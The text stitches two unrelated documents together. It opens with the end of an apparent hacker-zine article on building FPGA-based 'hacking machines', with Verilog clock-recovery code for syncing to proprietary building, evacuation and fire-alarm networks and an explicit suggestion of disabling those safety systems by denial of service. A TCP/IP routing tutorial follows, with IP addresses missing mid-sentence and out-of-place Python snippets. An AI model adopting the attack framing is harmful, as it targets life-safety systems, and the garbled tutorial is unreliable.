hardware-driven module. It can also be changed from an online cracker 
into a proxy within a second. 

    At this point, the uniqueness of the FPGA architecture should be 
clear, so it is time to discuss the black magic of hardware 
re-programmability in further detail. Using the NIOS core, we explore 
two directions: custom instructions and user peripherals. A custom 
instruction is hardware-driven and implemented by custom logic, as 
shown below:

       |     |Custom Logic|-|
       | |-->|------------| |
       | |                  | 
       | | |----------------||
    A ---->|               |-|
       |   |  Nios-ALU     | |----> OUT
    B ---->|               |-|

By defining custom logic connected in parallel with the Nios-ALU 
inputs, a new custom instruction is created. With SOPC Builder, custom 
logic can easily be added to and removed from the Nios-ALU, and so can 
custom instructions. Now we create a new custom instruction, say 
nm_fpmult(), and apply the following code:

    float a, b, result_slow, result_fast;

    result_slow = a * b;            //Takes 2874 clock cycles
    result_fast = nm_fpmult(a, b);  //Takes 19 clock cycles

From the running results, hardware-based multiplication as a custom 
instruction is so fast that it even beats a DSP chip. For cracking 
purposes, a custom instruction set can be built up according to the 
frequency of the operations being used. The instruction set is easy to 
plug and unplug for the different types of encryption being cracked.

    The user peripheral is the second piece of black magic enabled by 
hardware re-programmability. As we know, the NIOS core is a soft 
processor, so a bus specification is needed for the soft processor to 
communicate with other peripherals such as RAM, ROM, UART, and timers. 
The NIOS core uses a proprietary bus specification, known as the 
Avalon bus, for peripheral-to-peripheral and NIOS-core-to-peripheral 
communication. User peripherals such as IDE and USB modules are 
usually designed to expand the usability of an embedded system. For 
hacking purposes, we ignore IDE and USB peripherals; we are more 
interested in designing user peripherals for custom communication 
channel synchronization. When we consider hacking a customized system 
- such as building automation, public addressing, evacuation, or 
security - the main obstacle is its proprietary communication protocol 
[17, 18, 19, 20, 21, 22]. 

    In such cases, a typical network interface is almost impossible to 
synchronize to the communication channel of a customized system. For 
example, in a system running at 50Mbps, neither a 10Base-T nor a 
100Base-T network interface card can communicate with any module 
within the system. However, knowing the technical specification of 
such a system, a custom communication peripheral can be created in the 
FPGA, making it possible to synchronize our "hacking machine" to the 
communication channel of the customized system. Through the Avalon 
bus, the NIOS core can then manipulate the data-flow of the customized 
system; the custom communication peripheral becomes the customized 
media gateway of our "hacking machine". The theoretical basis of the 
custom communication peripheral comes from the mechanism of clock data 
recovery (CDR). CDR is a method of ensuring that data regeneration is 
done with a decision circuit that samples the data signal at the 
optimal instant indicated by a clock. The clock must be synchronized 
to exactly the same frequency as the data rate and be aligned in phase 
with respect to the data. Producing such a clock at the receiver is 
the goal of CDR. In general, the task of CDR is divided in two: 
frequency acquisition and timing alignment. 
    Frequency acquisition is the process that locks the receiver clock 
frequency to the transmitted data frequency. Timing alignment is the 
phase alignment of the clock so the decision circuit samples the data 
at the optimal instant; it is sometimes also called bit 
synchronization or phase locking. Most timing alignment circuits can 
perform a limited degree of frequency acquisition, but additional 
acquisition aids may be needed. The data oversampling method is used 
to create the CDR for our "hacking machine". With data oversampling, 
frequency acquisition no longer needs to be considered in the design: 
as long as the sampling frequency is always N times the data rate, the 
CDR works normally. To synchronize multiple customized systems, a 
frequency synthesis unit such as a PLL is recommended, to keep the 
sampling frequency at N times the data rate. A framework of CDR based 
on the data oversampling method with N=4 is shown below:
**The sampling frequency is 48MHz (mclk), which is 4 times of 
  data rate (12MHz).

    //define input and output 

    input data_in;
    input mclk;
    input rst;

    output [15:0] data_buf;

    //asynchronous edge detector

    wire reset = (rst & ~(data_in ^ capture_buf));

    //data oversampling module

    reg capture_buf;

    always @ (posedge mclk or negedge rst)
      if (rst == 0) 
        capture_buf <= 0;
      else
        capture_buf <= data_in;

    //edge detection module

    reg [1:0] mclk_divd;

    always @ (posedge mclk or negedge reset)
      if (reset == 0) 
        mclk_divd <= 2'b00;	
      else
        mclk_divd <= mclk_divd + 1;

    //capture at data eye and put into a 16-bit buffer

    reg [15:0] data_buf;

    always @ (posedge mclk_divd[1] or negedge rst)
      if (rst == 0) 
        data_buf <= 0;
      else
        data_buf <= {data_buf[14:0],capture_buf};

    Once the channel is synchronized, the data can be transferred to 
the NIOS core through the Avalon bus for further processing and 
interaction. This CDR framework is well worth considering for channel 
synchronization in various types of custom communication channels; 
Jean P. Nicolle has shown another type of CDR for 10Base-T bit 
synchronization [23]. Someone might ask about the most common approach 
to CDR channel synchronization, the Phase-Locked Loop (PLL). Yes, that 
is the well-known analog approach, but we are more interested in the 
digital approach, for the same reason as before: hardware 
re-programmability, our FPGA black magic. Those interested in the 
advantages of the digital CDR approach over the analog one can refer 
to [24]. In any case, the analog CDR approach is the only option for a 
hardcore-based (Scenix, Rabbit, SC12, ...) "hacking machine" design, 
and it suffers from: 

1. Longer design time for each different data rate of the communication
   link. The PLL lock-time versus preamble length, the charge-pump
   circuit design, and the Voltage Controlled Oscillator (VCO) are all
   very critical points.

2. Fixed-structure design. Any change of "hacking application" requires
   re-designing the circuit itself, which is quite cumbersome.

    As a result, given a detailed technical specification of a 
customized system, the possibility of hacking into the system always 
exists, especially to launch a Denial of Service attack. Disabling an 
evacuation system or a fire alarm system during an emergency is a more 
serious problem than ever. Imagine different types of CDRs implemented 
in a single FPGA, with automatic switching to select the right CDR for 
channel synchronization. On the other hand, any custom-defined module 
can be plugged into the system and communicate freely through the 
Avalon bus. Besides, the generated hardware image can be downloaded 
into flash memory through tftp. Following a soft-reset to re-configure 
the FPGA, the "hacking machine" is successfully updated. So, it is 
ready to hack multiple custom systems at the same time.   

case study:

**The development of OPC technology is slowly becoming popular.
  According to the OPC Foundation, OPC technology can eliminate
  expensive custom interfaces and drivers traditionally required
  for moving information easily around the enterprise. It promotes 
  interoperability, including amongst different computing solutions
  and platforms both horizontally and vertically in the enterprise [25].

--[ 7. - What Else Of Magic That Embedded Linux Can Do ?

    So, we now know the weaknesses of embedded systems, and we also know 
how to utilize the advantages of embedded systems for hacking purposes. 
Then, what other magic can we do with an embedded system? This is a 
good question.

    Judging by the development of network applications, ubiquitous and 
pervasive computing will be the next big issues. Embedded systems will
probably be the future framework, as embedded firewalls, ubiquitous 
gateways/routers, embedded IDSes, mobile device security servers, and 
so on. While existing systems are still looking to become 
network-enabled, embedded systems have already established a unique 
position for such purposes. A good example is migrating MySQL onto 
embedded Linux to provide an online database-on-chip service (in an 
FPGA) for a building access system with RFID tags. Again, the usage and 
development of embedded systems has no limit; the only limit is the 
imagination.


**If an embedded system works as a server (http, ftp, ...), it is going
  to provide services such as web control, web monitoring, ...
**If an embedded system works as a client (http, ftp, telnet, ...), then
  it is more likely to be a programmable "hacking machine".

--[ 8. - Conclusion

    Embedded systems are an extremely useful technology, because we 
can't expect every processing unit in the world to be a personal 
computer. While we are beginning to exploit the usefulness of embedded 
systems, we need to consider all the cases properly: where we should 
use them and where we shouldn't. Embedded security might be too new to 
discuss seriously now, but it always exists, and is sometimes naive. 
Besides, the abuse of embedded systems would cause ever more mysterious 
cases in the hacking world.

--=[ References






A TCP/IP Tutorial : Behind The Internet (part 2 of 2)

5.  Internet Protocol

   The IP module is central to internet technology and the essence of IP
   is its route table.  IP uses this in-memory table to make all
   decisions about routing an IP packet.  The content of the route table
   is defined by the network administrator.  Mistakes block
   communication.

   To understand how a route table is used is to understand
   internetworking.  This understanding is necessary for the successful
   administration and maintenance of an IP network.

   The route table is best understood by first having an overview of
   routing, then learning about IP network addresses, and then looking
   at the details.

5.1  Direct Routing

   The figure below is of a tiny internet with 3 computers: A, B, and C.
   Each computer has the same TCP/IP protocol stack as in Figure 1.
   Each computer's Ethernet interface has its own Ethernet address.
   Each computer has an IP address assigned to the IP interface by the
   network manager, who also has assigned an IP network number to the
   Ethernet.

                          A      B      C
                          |      |      |
                        Ethernet 1
                        IP network "development"

                       Figure 6.  One IP Network

   When A sends an IP packet to B, the IP header contains A's IP address
   as the source IP address, and the Ethernet header contains A's
   Ethernet address as the source Ethernet address.  Also, the IP header
   contains B's IP address as the destination IP address and the
   Ethernet header contains B's Ethernet address as the destination
   Ethernet address.

                |address            source  destination|
                |IP header          A       B          |
                |Ethernet header    A       B          |
       TABLE 5.  Addresses in an Ethernet frame for an IP packet
                              from A to B

   For this simple case, IP is overhead because the IP adds little to
   the service offered by Ethernet.  However, IP does add cost: the
   extra CPU processing and network bandwidth to generate, transmit, and
   parse the IP header.

   When B's IP module receives the IP packet from A, it checks the
   destination IP address against its own, looking for a match, then it
   passes the datagram to the upper-level protocol.

   This communication between A and B uses direct routing.

5.2  Indirect Routing

   The figure below is a more realistic view of an internet.  It is
   composed of 3 Ethernets and 3 IP networks connected by an IP-router
   called computer D.  Each IP network has 4 computers; each computer
   has its own IP address and Ethernet address.

          A      B      C      ----D----      E      F      G
          |      |      |      |   |   |      |      |      |
        --o------o------o------o-  |  -o------o------o------o--
        Ethernet 1                 |  Ethernet 2
        IP network "development"   |  IP network "accounting"
                                   |     H      I      J
                                   |     |      |      |
                                  Ethernet 3
                                  IP network "factory"

               Figure 7.  Three IP Networks; One internet

   Except for computer D, each computer has a TCP/IP protocol stack like
   that in Figure 1.  Computer D is the IP-router; it is connected to
   all 3 networks and therefore has 3 IP addresses and 3 Ethernet
   addresses.  Computer D has a TCP/IP protocol stack similar to that in
   Figure 3, except that it has 3 ARP modules and 3 Ethernet drivers
   instead of 2.  Please note that computer D has only one IP module.

   The network manager has assigned a unique number, called an IP
   network number, to each of the Ethernets.  The IP network numbers are
   not shown in this diagram, just the network names.

   When computer A sends an IP packet to computer B, the process is
   identical to the single network example above.  Any communication
   between computers located on a single IP network matches the direct
   routing example discussed previously.

   When computer D and A communicate, it is direct communication.  When
   computer D and E communicate, it is direct communication.  When
   computer D and H communicate, it is direct communication.  This is
   because each of these pairs of computers is on the same IP network.

   However, when computer A communicates with a computer on the far side
   of the IP-router, communication is no longer direct.  A must use D to
   forward the IP packet to the next IP network.  This communication is
   called "indirect".

   This routing of IP packets is done by IP modules and happens
   transparently to TCP, UDP, and the network applications.

   If A sends an IP packet to E, the source IP address and the source
   Ethernet address are A's.  The destination IP address is E's, but
   because A's IP module sends the IP packet to D for forwarding, the
   destination Ethernet address is D's.

                |address            source  destination|
                |IP header          A       E          |
                |Ethernet header    A       D          |
       TABLE 6.  Addresses in an Ethernet frame for an IP packet
                         from A to E (before D)

   D's IP module receives the IP packet and upon examining the
   destination IP address, says "This is not my IP address," and sends
   the IP packet directly to E.

                |address            source  destination|
                |IP header          A       E          |
                |Ethernet header    D       E          |
       TABLE 7.  Addresses in an Ethernet frame for an IP packet
                         from A to E (after D)

   In summary, for direct communication, both the source IP address and
   the source Ethernet address is the sender's, and the destination IP
   address and the destination Ethernet address is the recipient's.  For
   indirect communication, the IP address and Ethernet addresses do not
   pair up in this way.
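
The addressing rule of Tables 5 through 7 can be condensed into a few
lines. This Python sketch is illustrative only; `frame_addresses` is an
invented helper, not part of any real protocol stack.

```python
def frame_addresses(src, dst, same_network, router=None):
    """Return (IP src, IP dst, Ethernet src, Ethernet dst) for a frame.

    Direct routing: both address pairs name sender and recipient.
    Indirect routing: the Ethernet destination is the router's, while
    the IP destination still names the final recipient.
    """
    eth_dst = dst if same_network else router
    return (src, dst, src, eth_dst)

# A to B on one Ethernet (Table 5): Ethernet destination is B itself.
print(frame_addresses("A", "B", same_network=True))
# A to E through router D (Table 6): Ethernet destination is D.
print(frame_addresses("A", "E", same_network=False, router="D"))
```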

   This example internet is a very simple one.  Real networks are often
   complicated by many factors, resulting in multiple IP-routers and
   several types of physical networks.  This example internet might have
   come about because the network manager wanted to split a large
   Ethernet in order to localize Ethernet broadcast traffic.

5.3  IP Module Routing Rules

   This overview of routing has shown what happens, but not how it
   happens.  Now let's examine the rules, or algorithm, used by the IP
   module.

     For an outgoing IP packet, entering IP from an upper layer, IP must
     decide whether to send the IP packet directly or indirectly, and IP
     must choose a lower network interface.  These choices are made by
     consulting the route table.

     For an incoming IP packet, entering IP from a lower interface, IP
     must decide whether to forward the IP packet or pass it to an upper
     layer.  If the IP packet is being forwarded, it is treated as an
     outgoing IP packet.

     When an incoming IP packet arrives it is never forwarded back out
     through the same network interface.

   These decisions are made before the IP packet is handed to the lower
   interface and before the ARP table is consulted.

5.4  IP Address

   The network manager assigns IP addresses to computers according to
   the IP network to which the computer is attached.  One part of a 4-
   byte IP address is the IP network number, the other part is the IP
   computer number (or host number).  For the computer in table 1, with
   an IP address of, the network number is 223.1.2 and the
   host number is number 1.

   The portion of the address that is used for network number and for
   host number is defined by the upper bits in the 4-byte address.  All
   example IP addresses in this tutorial are of type class C, meaning
   that the upper 3 bits indicate that 21 bits are the network number
   and 8 bits are the host number.  This allows 2,097,152 class C
   networks, with up to 254 hosts on each network.

   The IP address space is administered by the NIC (Network Information
   Center).  All internets that are connected to the single world-wide
   Internet must use network numbers assigned by the NIC.  If you are
   setting up your own internet and you are not intending to connect it
   to the Internet, you should still obtain your network numbers from
   the NIC.  If you pick your own number, you run the risk of confusion
   and chaos in the eventuality that your internet is connected to
   another internet.

5.5  Names

   People refer to computers by names, not numbers.  A computer called
   alpha might have the IP address of  For small networks,
   this name-to-address translation data is often kept on each computer
   in the "hosts" file.  For larger networks, this translation data file
   is stored on a server and accessed across the network when needed.  A
   few lines from that file might look like this:

        alpha
        beta
        gamma
        delta
      epsilon
        iota

   The IP address is the first column and the computer name is the
   second column.

   In most cases, you can install identical "hosts" files on all
   computers.  You may notice that "delta" has only one entry in this
   file even though it has 3 IP addresses.  Delta can be reached with
   any of its IP addresses; it does not matter which one is used.  When
   delta receives an IP packet and looks at the destination address, it
   will recognize any of its own IP addresses.

   IP networks are also given names.  If you have 3 IP networks, your
   "networks" file for documenting these names might look something like

   223.1.2     development
   223.1.3     accounting
   223.1.4     factory

   The IP network number is in the first column and its name is in the
   second column.

   From this example you can see that alpha is computer number 1 on the
   development network, beta is computer number 2 on the development
   network and so on.  You might also say that alpha is development.1,
   beta is development.2, and so on.

   The above hosts file is adequate for the users, but the network
   manager will probably replace the line for delta with:

      devnetrouter    delta
      facnetrouter
      accnetrouter

   These three new lines for the hosts file give each of delta's IP
   addresses a meaningful name.  In fact, the first IP address listed
   has 2 names; "delta" and "devnetrouter" are synonyms.  In practice
   "delta" is the general-purpose name of the computer and the other 3
   names are only used when administering the IP route table.

   These files are used by network administration commands and network
   applications to provide meaningful names.  They are not required for
   operation of an internet, but they do make it easier for us.

5.6  IP Route Table

   How does IP know which lower network interface to use when sending
   out an IP packet?  IP looks it up in the route table using a search
   key of the IP network number extracted from the IP destination
   address.

   The route table contains one row for each route.  The primary columns
   in the route table are:  IP network number, direct/indirect flag,
   router IP address, and interface number.  This table is referred to
   by IP for each outgoing IP packet.

   On most computers the route table can be modified with the "route"
   command.  The content of the route table is defined by the network
   manager, because the network manager assigns the IP addresses to the
   computers.

5.7  Direct Routing Details

   To explain how it is used, let us visit in detail the routing
   situations we have reviewed previously.

                        ---------         ---------
                        | alpha |         | beta  |
                        |    1  |         |  1    |
                        ---------         ---------
                             |               |
                      Ethernet 1
                      IP network "development"

               Figure 8.  Close-up View of One IP Network

   The route table inside alpha looks like this:

     |network      direct/indirect flag  router   interface number|
     |development  direct                <blank>  1               |
                  TABLE 8.  Example Simple Route Table

   This view can be seen on some UNIX systems with the "netstat -r"
   command.  With this simple network, all computers have identical
   routing tables.

   For discussion, the table is printed again without the network number
   translated to its network name.

     |network      direct/indirect flag  router   interface number|
     |223.1.2      direct                <blank>  1               |
           TABLE 9.  Example Simple Route Table with Numbers

5.8  Direct Scenario

   Alpha is sending an IP packet to beta.  The IP packet is in alpha's
   IP module and the destination IP address is beta or  IP
   extracts the network portion of this IP address and scans the first
   column of the table looking for a match.  With this network a match
   is found on the first entry.

   The other information in this entry indicates that computers on this
   network can be reached directly through interface number 1.  An ARP
   table translation is done on beta's IP address then the Ethernet
   frame is sent directly to beta via interface number 1.

   If an application tries to send data to an IP address that is not on
   the development network, IP will be unable to find a match in the
   route table.  IP then discards the IP packet.  Some computers provide
   a "Network not reachable" error message.

5.9  Indirect Routing Details

   Now, let's take a closer look at the more complicated routing
   scenario that we examined previously.

          ---------           ---------           ---------
          | alpha |           | delta |           |epsilon|
          |    1  |           |1  2  3|           |   1   |
          ---------           ---------           ---------
               |               |  |  |                |
       --------o---------------o- | -o----------------o--------
        Ethernet 1                |     Ethernet 2
        IP network "Development"  |     IP network "accounting"
                                  |     --------
                                  |     | iota |
                                  |     |  1   |
                                  |     --------
                                  |        |
                                    Ethernet 3
                                    IP network "factory"

             Figure 9.  Close-up View of Three IP Networks

   The route table inside alpha looks like this:

 |network      direct/indirect flag  router          interface number|
 |development  direct                <blank>         1               |
 |accounting   indirect              devnetrouter    1               |
 |factory      indirect              devnetrouter    1               |
                      TABLE 10.  Alpha Route Table

   For discussion the table is printed again using numbers instead of
   names.

  |network      direct/indirect flag  router         interface number|
  |223.1.2      direct                <blank>        1               |
  |223.1.3      indirect        1               |
  |223.1.4      indirect        1               |
               TABLE 11.  Alpha Route Table with Numbers

   The router in Alpha's route table is the IP address of delta's
   connection to the development network.

5.10  Indirect Scenario

   Alpha is sending an IP packet to epsilon.  The IP packet is in
   alpha's IP module and the destination IP address is epsilon
   (  IP extracts the network portion of this IP address
   (223.1.3) and scans the first column of the table looking for a
   match.  A match is found on the second entry.

   This entry indicates that computers on the 223.1.3 network can be
   reached through the IP-router devnetrouter.  Alpha's IP module then
   does an ARP table translation for devnetrouter's IP address and sends
   the IP packet directly to devnetrouter through Alpha's interface
   number 1.  The IP packet still contains the destination address of
   epsilon.

   The IP packet arrives at delta's development network interface and is
   passed up to delta's IP module.  The destination IP address is
   examined and because it does not match any of delta's own IP
   addresses, delta decides to forward the IP packet.

   Delta's IP module extracts the network portion of the destination IP
   address (223.1.3) and scans its route table for a matching network
   field.  Delta's route table looks like this:

 |network      direct/indirect flag  router           interface number|
 |development  direct                <blank>          1               |
 |accounting   direct                <blank>          3               |
 |factory      direct                <blank>          2               |
                     TABLE 12.  Delta's Route Table

   Below is delta's table printed again, without the translation to
   names.

 |network      direct/indirect flag  router           interface number|
 |223.1.2      direct                <blank>          1               |
 |223.1.3      direct                <blank>          3               |
 |223.1.4      direct                <blank>          2               |
              TABLE 13.  Delta's Route Table with Numbers

   The match is found on the second entry.  IP then sends the IP packet
   directly to epsilon through interface number 3.  The IP packet
   contains the IP destination address of epsilon and the Ethernet
   destination address of epsilon.

   The IP packet arrives at epsilon and is passed up to epsilon's IP
   module.  The destination IP address is examined and found to match
   with epsilon's IP address, so the IP packet is passed to the upper
   protocol layer.

5.11  Routing Summary

   When an IP packet travels through a large internet it may go through
   many IP-routers before it reaches its destination.  The path it takes
   is not determined by a central source but is a result of consulting
   each of the routing tables used in the journey.  Each computer
   defines only the next hop in the journey and relies on that computer
   to send the IP packet on its way.

5.12  Managing the Routes

   Maintaining correct routing tables on all computers in a large
   internet is a difficult task; network configuration is being modified
   constantly by the network managers to meet changing needs.  Mistakes
   in routing tables can block communication in ways that are
   excruciatingly tedious to diagnose.

   Keeping a simple network configuration goes a long way towards making
   a reliable internet.  For instance, the most straightforward method
   of assigning IP networks to Ethernet is to assign a single IP network
   number to each Ethernet.

   Help is also available from certain protocols and network
   applications.  ICMP (Internet Control Message Protocol) can report
   some routing problems.  For small networks the route table is filled
   manually on each computer by the network administrator.  For larger
   networks the network administrator automates this manual operation
   with a routing protocol to distribute routes throughout a network.

   When a computer is moved from one IP network to another, its IP
   address must change.  When a computer is removed from an IP network
   its old address becomes invalid.  These changes require frequent
   updates to the "hosts" file.  This flat file can become difficult to
   maintain for even medium-size networks.  The Domain Name System helps
   solve these problems.

6.  User Datagram Protocol

   UDP is one of the two main protocols to reside on top of IP.  It
   offers service to the user's network applications.  Example network
   applications that use UDP are:  Network File System (NFS) and Simple
   Network Management Protocol (SNMP).  The service is little more than
   an interface to IP.

   UDP is a connectionless datagram delivery service that does not
   guarantee delivery.  UDP does not maintain an end-to-end connection
   with the remote UDP module; it merely pushes the datagram out on the
   net and accepts incoming datagrams off the net.

   UDP adds two values to what is provided by IP.  One is the
   multiplexing of information between applications based on port
   number.  The other is a checksum to check the integrity of the data.

6.1  Ports

   How does a client on one computer reach the server on another?

   The path of communication between an application and UDP is through
   UDP ports.  These ports are numbered, beginning with zero.  An
   application that is offering service (the server) waits for messages
   to come in on a specific port dedicated to that service.  The server
   waits patiently for any client to request service.

   For instance, the SNMP server, called an SNMP agent, always waits on
   port 161.  There can be only one SNMP agent per computer because
   there is only one UDP port number 161.  This port number is well
   known; it is a fixed number, an internet assigned number.  If an SNMP
   client wants service, it sends its request to port number 161 of UDP
   on the destination computer.
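
Port demultiplexing boils down to a port-to-application table. The
sketch below is purely illustrative; the handler name is invented.

```python
# Each server binds one well-known port; UDP hands datagrams over by port.
bound_ports = {161: "snmp-agent"}

def deliver(port, datagram):
    app = bound_ports.get(port)
    if app is None:
        return None          # no application bound: datagram is discarded
    return (app, datagram)

print(deliver(161, b"get sysDescr"))   # ('snmp-agent', b'get sysDescr')
print(deliver(9999, b"noise"))         # None - discarded
```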

   When an application sends data out through UDP it arrives at the far
   end as a single unit.  For example, if an application does 5 writes
   to the UDP port, the application at the far end will do 5 reads from
   the UDP port.  Also, the size of each write matches the size of each
   read.

   UDP preserves the message boundary defined by the application.  It
   never joins two application messages together, or divides a single
   application message into parts.

6.2  Checksum

   An incoming IP packet with an IP header type field indicating "UDP"
   is passed up to the UDP module by IP.  When the UDP module receives
   the UDP datagram from IP it examines the UDP checksum.  If the
   checksum is zero, it means that checksum was not calculated by the
   sender and can be ignored.  Thus the sending computer's UDP module
   may or may not generate checksums.  If Ethernet is the only network
   between the 2 UDP modules communicating, then you may not need
   checksumming.  However, it is recommended that checksum generation
   always be enabled because at some point in the future a route table
   change may send the data across less reliable media.
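
For the curious, the 16-bit one's-complement checksum itself (the
RFC 1071 method) is short. Note that a real UDP checksum also covers a
pseudo-header containing the IP addresses; this sketch shows only the
core sum.

```python
def internet_checksum(data: bytes) -> int:
    """16-bit one's-complement checksum (RFC 1071 style)."""
    if len(data) % 2:
        data += b"\x00"                # pad odd-length data with a zero byte
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]
    while total >> 16:                 # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF
```

A computed value of zero is transmitted as 0xFFFF, so that a literal
zero in the header can keep its special "no checksum" meaning.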

   If the checksum is valid (or zero), the destination port number is
   examined and if an application is bound to that port, an application
   message is queued for the application to read.  Otherwise the UDP
   datagram is discarded.  If the incoming UDP datagrams arrive faster
   than the application can read them and if the queue fills to a
   maximum value, UDP datagrams are discarded by UDP.  UDP will continue
   to discard UDP datagrams until there is space in the queue.

7.  Transmission Control Protocol

   TCP provides a different service than UDP.  TCP offers a connection-
   oriented byte stream, instead of a connectionless datagram delivery
   service.  TCP guarantees delivery, whereas UDP does not.

   TCP is used by network applications that require guaranteed delivery
   and cannot be bothered with doing time-outs and retransmissions.  The
   two most typical network applications that use TCP are File Transfer
   Protocol (FTP) and the TELNET.  Other popular TCP network
   applications include X-Window System, rcp (remote copy), and the r-
   series commands.  TCP's greater capability is not without cost: it
   requires more CPU and network bandwidth.  The internals of the TCP
   module are much more complicated than those in a UDP module.

   Similar to UDP, network applications connect to TCP ports.  Well-
   defined port numbers are dedicated to specific applications.  For
   instance, the TELNET server uses port number 23.  The TELNET client
   can find the server simply by connecting to port 23 of TCP on the
   specified computer.

   When the application first starts using TCP, the TCP module on the
   client's computer and the TCP module on the server's computer start
   communicating with each other.  These two end-point TCP modules
   contain state information that defines a virtual circuit.  This
   virtual circuit consumes resources in both TCP end-points.  The
   virtual circuit is full duplex; data can go in both directions
   simultaneously.  The application writes data to the TCP port, the
   data traverses the network and is read by the application at the far
   end.

   As with all sliding window protocols, the protocol has a window size.
   The window size determines the amount of data that can be transmitted
   before an acknowledgement is required.  For TCP, this amount is not a
   number of TCP segments but a number of bytes.
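
Window accounting can be sketched in a couple of lines; this is a toy
model, not TCP's actual state machine.

```python
def sendable(window, in_flight, pending):
    """Bytes that may be transmitted now.

    TCP's window counts bytes, not segments, so the limit is the window
    size minus the bytes already sent but not yet acknowledged.
    """
    return min(pending, max(0, window - in_flight))

print(sendable(window=4096, in_flight=1024, pending=8192))  # 3072
# With the window full, the sender must wait for acknowledgements.
print(sendable(window=4096, in_flight=4096, pending=8192))  # 0
```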

8.  Network Applications

   Why do both TCP and UDP exist, instead of just one or the other?

   They supply different services.  Most applications are implemented to
   use only one or the other.  You, the programmer, choose the protocol
   that best meets your needs.  If you need a reliable stream delivery
   service, TCP might be best.  If you need a datagram service, UDP
   might be best.  If you need efficiency over long-haul circuits, TCP
   might be best.  If you need efficiency over fast networks with short
   latency, UDP might be best.  If your needs do not fall nicely into
   these categories, then the "best" choice is unclear.  However,
   applications can make up for deficiencies in the choice.  For
   instance if you choose UDP and you need reliability, then the
   application must provide reliability.  If you choose TCP and you need
   a record oriented service, then the application must insert markers
   in the byte stream to delimit records.
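
The record markers mentioned above are typically length prefixes. A
purely illustrative sketch:

```python
import struct

def pack_records(records):
    """Delimit records in a byte stream with 2-byte length prefixes."""
    return b"".join(struct.pack(">H", len(r)) + r for r in records)

def unpack_records(stream):
    """Recover the records the sender delimited."""
    records, i = [], 0
    while i < len(stream):
        (n,) = struct.unpack_from(">H", stream, i)
        records.append(stream[i + 2 : i + 2 + n])
        i += 2 + n
    return records

blob = pack_records([b"first", b"second record"])
print(unpack_records(blob))   # [b'first', b'second record']
```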

   What network applications are available?

   There are far too many to list.  The number is growing continually.
   Some of the applications have existed since the beginning of internet
   technology: TELNET and FTP.  Others are relatively new: X-Windows and
   SNMP.  The following is a brief description of the applications
   mentioned in this tutorial.

8.1  TELNET

   TELNET provides a remote login capability on TCP.  The operation and
   appearance is similar to keyboard dialing through a telephone switch.
   On the command line the user types "telnet delta" and receives a
   login prompt from the computer called "delta".

   TELNET works well; it is an old application and has widespread
   interoperability.  Implementations of TELNET usually work between
   different operating systems.  For instance, a TELNET client may be on
   VAX/VMS and the server on UNIX System V.

8.2  FTP

   File Transfer Protocol (FTP), as old as TELNET, also uses TCP and has
   widespread interoperability.  The operation and appearance is as if
   you TELNETed to the remote computer.  But instead of typing your
   usual commands, you have to make do with a short list of commands for
   directory listings and the like.  FTP commands allow you to copy
   files between computers.

8.3  rsh

   Remote shell (rsh or remsh) is one of an entire family of remote UNIX
   style commands.  The UNIX copy command, cp, becomes rcp.  The UNIX
   "who is logged in" command, who, becomes rwho.  The list continues
   and is referred to collectively as the "r" series commands or the
   "r*" (r star) commands.

   The r* commands mainly work between UNIX systems and are designed for
   interaction between trusted hosts.  Little consideration is given to
   security, but they provide a convenient user environment.

   To execute the "cc file.c" command on a remote computer called delta,
   type "rsh delta cc file.c".  To copy the "file.c" file to delta, type
   "rcp file.c delta:".  To login to delta, type "rlogin delta", and if
   you administered the computers in a certain way, you will not be
   challenged with a password prompt.

8.4  NFS

   Network File System, first developed by Sun Microsystems Inc, uses
   UDP and is excellent for mounting UNIX file systems on multiple
   computers.  A diskless workstation can access its server's hard disk
   as if the disk were local to the workstation.  A single disk copy of
   a database on mainframe "alpha" can also be used by mainframe "beta"
   if the database's file system is NFS mounted.  The NFS client is
   implemented in the kernel, allowing applications and commands to use
   the NFS mounted disk as if it were local disk.
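   Because NFS uses UDP, each request and reply travels as a single
   datagram rather than over a connection.  The loopback sketch below
   shows that datagram pattern in miniature; the "READ" message is made
   up for illustration and is not real NFS/RPC traffic:

```python
import socket

# UDP socket standing in for an NFS server's port (not real NFS/RPC).
server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server.bind(("127.0.0.1", 0))
addr = server.getsockname()

client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client.sendto(b"READ /etc/motd", addr)          # one datagram per request
request, client_addr = server.recvfrom(512)
server.sendto(b"OK " + request.split()[1], client_addr)  # one per reply
reply, _ = client.recvfrom(512)

client.close()
server.close()
print(reply.decode())                            # OK /etc/motd
```

   No connection is set up or torn down; that is what makes UDP a light
   fit for a request/reply service like NFS.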

8.5  SNMP

   Simple Network Management Protocol (SNMP) uses UDP and is designed
   for use by central network management stations.  It is a well known
   fact that if given enough data, a network manager can detect and
   diagnose network problems.  The central station uses SNMP to collect
   this data from other computers on the network.  SNMP defines the
   format for the data; it is left to the central station or network
   manager to interpret the data.
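   One concrete piece of the format SNMP defines is the naming of each
   managed variable by an ASN.1 object identifier, encoded with BER:
   the first two arcs share one octet (40*x + y), and later arcs use
   base-128 octets with the high bit marking continuation.  A sketch of
   that content encoding (tag and length octets omitted):

```python
def encode_oid(dotted):
    """BER-encode an object identifier such as '1.3.6.1.2.1.1.1.0'.

    Returns the content octets only, without the tag/length header.
    """
    arcs = [int(a) for a in dotted.split(".")]
    out = [40 * arcs[0] + arcs[1]]        # first two arcs share one octet
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]              # low 7 bits last
        arc >>= 7
        while arc:
            chunk.append((arc & 0x7F) | 0x80)  # high bit: more octets follow
            arc >>= 7
        out.extend(reversed(chunk))
    return bytes(out)

# sysDescr.0 from the standard MIB-II subtree:
print(encode_oid("1.3.6.1.2.1.1.1.0").hex())   # 2b06010201010100
```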

8.6  X-Window

   The X Window System uses the X Window protocol on TCP to draw windows
   on a workstation's bitmap display.  X Window is much more than a
   utility for drawing windows; it is an entire philosophy for designing
   a user interface.

9.  Other Information

   Much information about internet technology was not included in this
   tutorial.  This section lists information that is considered the next
   level of detail for the reader who wishes to learn more.

     o administration commands: arp, route, and netstat
     o ARP: permanent entry, publish entry, time-out entry, spoofing
     o IP route table: host entry, default gateway, subnets
     o IP: time-to-live counter, fragmentation, ICMP
     o RIP, routing loops
     o Domain Name System

10.  References

   [1] Comer, D., "Internetworking with TCP/IP Principles, Protocols,
       and Architecture", Prentice Hall, Englewood Cliffs, New Jersey,
       U.S.A., 1988.

